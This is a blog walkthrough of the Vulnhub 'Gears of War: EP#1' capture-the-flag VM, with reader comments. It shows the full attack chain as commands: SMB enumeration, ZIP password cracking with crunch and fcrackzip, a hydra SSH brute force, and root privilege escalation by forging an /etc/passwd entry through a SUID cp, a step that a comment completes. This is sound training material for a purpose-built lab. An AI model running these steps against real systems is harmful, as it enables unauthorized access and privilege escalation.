Categories

Archives

CTF Challenges

Gears of War: EP#1 Vulnhub Walkthrough

Gears of War: EP#1 VM is made by eDu809. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

  • Netdiscover
  • Nmap Port Scan

Enumeration

  • Browsing HTTP Service
  • SMB Login

Exploiting

  • Using Crunch to generate a wordlist
  • Using Fcrack to bruteforce ZIP file password
  • Using Hydra to bruteforce SSH Login

Privilege Escalation

  • Reading /etc/passwd File
  • Getting SUID bit files
  • Using Openssl for generating a password hash
  • Adding  User to /tmp file
  • Reading Final Flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.

netdiscover

We found the target IP Address 192.168.1.184. Let’s begin with basic port scanning with NMAP.

nmap -A -p- 192.168.1.184

Enumeration

For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.

Since HTTP service was not much of a help. On the other hand, we can clearly note from the nmap scan that we have the SMB service running, and we don’t have any credentials for the ssh so we went directly on with SMB. We logged in using the command mentioned. There is a list of shared directories. We tried accessing LOCUS_LAN$ directory and enumerated it. We find a notes.txt file and msg_horda.zip file. Let’s transfer these files on our machine to read their contents.

smbclient -L 192.168.1.184
smbclient //192.168.1.184/LOCUS_LAN$
get msg_horda.zip
get SOS.txt
ls

We tried opening the msg_horda.zip file but it seems password protected.

We thought of reading the contents of SOS.txt file and it was a success. It surely gave us a hint about the characters of the password for ZIP file.

Exploiting

It’s time to FIRE UP!! Crunch and generate a wordlist as per the combination of the password we have fetched from the SOS.txt file.

crunch 4 4 -t @%%, -o wordlist

Once the wordlist is all set up, we have used FCRACK TOOL to crack the password for the ZIP file as shown below.

frackzip -D -u -v -p wordlist msg_horda.zip

The password for the ZIP file is r44M. We also found a key.txt file inside the ZIP file.

After reading the key.txt file, we got another credential which could be useful for SSH login but we still need a username. Bring up HYDRA.

We have brute forced the username for SSh Login using hydra with password 3_d4y.

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y -T4 192.168.1.184 ssh

After successfully logged into SSH, we try enumerating the /etc directory but couldn’t because user Marcus doesn’t have the privileges to access the /etc directory.

ssh marcus@192.168.1.184
id
cd /etc

Privilege Escalation

Since our target machine is in a bash shell. We will be using a command to force SSH for TTY allocation. This will help us run commands as an administrator. Finally, we are able to access the /etc directory.

ssh marcus@192.168.1.184 -t "bash --noprofile"
cd /etc

pwd

On reading the passwd file which was not much help, but we got an idea what we can do next.

cat passwd

On checking the SUID bit for all the readable files under /bin directory, we came to know that the current user can use the cp command. This is going to be interesting.

find /bin -type f -perm -u=s 2>/dev/null

Without any further waiting, we need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt raj pass123

Now back to our user marcus on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We have to use nano command to make an entry in the /tmp directory. After making an entry we checked the entry using the tail command. cd /tmp

nano passwd
cat passwd | tail

Now all we to do login using username and password, we just created to get our root shell. On enumeration we found flag.txt.

su raj
whoami
cd /root
ls -al

Time to Read our Final Flag!!

cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Security Analyst. Contact Here

5 thoughts on “Gears of War: EP#1 Vulnhub Walkthrough

  1. nmap -A -p 43.255.154.125

    By using this first command….

    root@Ganakshya:~# nmap -A -p 43.255.154.125
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 23:41 EST
    Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-”
    QUITTING!

    Comming like this….
    what to do sir…..?

    1. Hello Ganapathi,|

      Your command line is wrong at the port part.

      Try:

      nmap -A -p- IPNUMBER
      like:
      nmap -A -p- 192.168.100.60

      or

      nmap -A -p PORTNUMBER IPNUMBER
      like:
      nmap -A -p 80 192.168.100.60

    2. Hey,
      just give a space infront of -p.
      As you are not giving space, it looks like you are giving a port number as 43.255.154.125 and unfortunately there is no port like that.
      its taking your IP as a port number.
      Giving a space will solve your problem..
      Peace.

  2. Hi
    I get stock at creating usr
    i don’t know what to do in
    cd /tmp i did nano passwd and i put my password hash but when i write
    su my name it say no passwd entry for user ! can u tell me how i make it right please thanks

    1. Hello Mike
      They forgot 1 step:
      go to /tmp and do following:

      cp passwd /etc/

      You need to copy the passwd file you created to the /etc/passwd folder.

      Then you can switch to root user.

Comments are closed.